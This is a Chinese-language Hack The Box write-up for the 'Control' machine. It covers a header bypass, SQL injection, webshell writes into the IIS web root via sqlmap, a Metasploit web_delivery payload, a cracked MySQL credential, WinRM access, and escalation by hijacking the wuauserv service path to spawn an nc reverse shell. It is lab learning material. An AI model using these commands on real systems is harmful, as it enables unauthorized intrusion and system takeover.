基本信息
lab地址:https://www.hackthebox.eu/home/machines/profile/218
端口扫描
三个端口:
data:image/s3,"s3://crabby-images/07c2e/07c2e7cce98fe4a354c0889e0310decd7db6e7d6" alt=""
80
data:image/s3,"s3://crabby-images/72c56/72c56432eace7e3f44cb775e8e3ae94a5dc711bb" alt=""
扫描目录发现存在一个admin.php,直接访问被拒绝:
data:image/s3,"s3://crabby-images/fbf49/fbf49bc358c9b87d3c93e15f8479fd76c6f574c2" alt=""
data:image/s3,"s3://crabby-images/15731/15731ee56748b4a81688d7469ee24f6742894fc8" alt=""
提示缺失Header,需要通过代理访问,代理header那应该是XFF之类的,在首页源码能看到注释中的信息:
data:image/s3,"s3://crabby-images/b3525/b3525a8edcc699ddc3dce5581309588056872341" alt=""
那么可以尝试用这个IP作为XFF头,直接burp加一条规则:
data:image/s3,"s3://crabby-images/1466e/1466e9be85747df42f9f3d668d815c783c81d7e4" alt=""
data:image/s3,"s3://crabby-images/0b52c/0b52cfafd42923c0563c7b00d529b23e09546c64" alt=""
SQL注入
是一个简单的CRUD,很容易就发现存在注入:
data:image/s3,"s3://crabby-images/526a5/526a53502c61cb475df108a292feafa8feec1bcf" alt=""
不是DBA,直接os-shell能写入UDF,但没有回显:
data:image/s3,"s3://crabby-images/31774/3177427e0ac9b159a7336ef60d4ad9c995afbd55" alt=""
getshell
那么可以尝试写webshell,因为是IIS,sql-shell测试写到IIS默认目录可以写入成功:
1 | select "<?php phpinfo(); ?>" into outfile "C:/inetpub/wwwroot/info.php": 'NULL' |
data:image/s3,"s3://crabby-images/3e05b/3e05ba452e782dabf6deb7e7cf509954b6baf82d" alt=""
Sql-shell里写太麻烦,直接这样写webshell
1 | sqlmap -r sql.txt --file-write=shell.php --file-dest=C:/inetpub/wwwroot/shell.php --batch |
data:image/s3,"s3://crabby-images/59c92/59c925b2638596a605ab2f49f4e79a4fdf29f2f8" alt=""
然后为了方便可以直接上meterpreter:
1 | use exploit/multi/script/web_delivery |
data:image/s3,"s3://crabby-images/65c83/65c8363ab971ee97c5c10b2db529996abfcb9cad" alt=""
账号信息
可以在database.php里发现一个账号密码:
data:image/s3,"s3://crabby-images/23b43/23b43bf5b5e2bbdbd5322db7a2298f2dae3dbc93" alt=""
另外也可以直接通过注入获取mysql账号密码:
1 | hector | *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D (l33th4x0rhector)| |
root的解不出来
WinRM
我们现在的shell是wwwroot用户,那么接下来应该就是要想办法切换到其他用户
netstat可以看到一个5985端口,这是WinRM 的默认端口,WinRM是Windows 系统的远程管理服务
data:image/s3,"s3://crabby-images/77c2a/77c2adde79eb4e1aabb4eccc9ca262c0c1bb1ea3" alt=""
进行端口转发,使用已经得到的账号密码尝试,能够知道hector的账号密码是正确的,但命令执行报错:
1 | portfwd add -l 5985 -p 5985 -r 10.10.10.167 |
data:image/s3,"s3://crabby-images/bbae7/bbae7b00a8ce5755132dd45780e3887a70802a7a" alt=""
可以换evil-winrm进行操作:
https://github.com/Hackplayers/evil-winrm
这里因为安装问题,换到虚拟机了,使用hector账号密码,在桌面得到user flag
data:image/s3,"s3://crabby-images/75687/75687cda398bfcca08e1c2261bf6718005708640" alt=""
敏感文件
在这个目录发现一个历史记录文件:
data:image/s3,"s3://crabby-images/24173/2417327a720679c0392267d6100a33d7ae9cf4ed" alt=""
1 | *Evil-WinRM* PS C:\Users\Hector\APpdata\roaming\microsoft\windows\powershell\PSreadline> type ConsoleHost_history.txt |
提权
这里可利用的是wuauserv,这个服务是Windows update的一个系统服务,系统权限。
data:image/s3,"s3://crabby-images/f9da9/f9da937e0f68132d99bb67906a7c6e61d650ceb5" alt=""
data:image/s3,"s3://crabby-images/4a957/4a957571ec883b207e8315f9799e7db317f2f7e6" alt=""
data:image/s3,"s3://crabby-images/59818/59818900ea2af8e5390af4151b73c540a495572d" alt=""
修改这个服务的imagepath,反弹shell,为了方便还是通过hector的shell加载个meterpreter,上传nc,然后
1 | reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services\wuauserv |
root flag
执行后得到system权限的reverse shell:
data:image/s3,"s3://crabby-images/fffb0/fffb0b4a593124b44368bc37e019c42b509cef87" alt=""
data:image/s3,"s3://crabby-images/1a0f8/1a0f8367eb5bdfde6c8776cca3556c837800b005" alt=""
参考资料
- Hackthebox——Control
https://mp.weixin.qq.com/s/8OugAknFrfKs5ujG4WKf1w - powershell反弹shell常见方式 - 安全客,安全资讯平台
https://www.anquanke.com/post/id/99793 - Windows提权笔记 - 先知社区
https://xz.aliyun.com/t/2519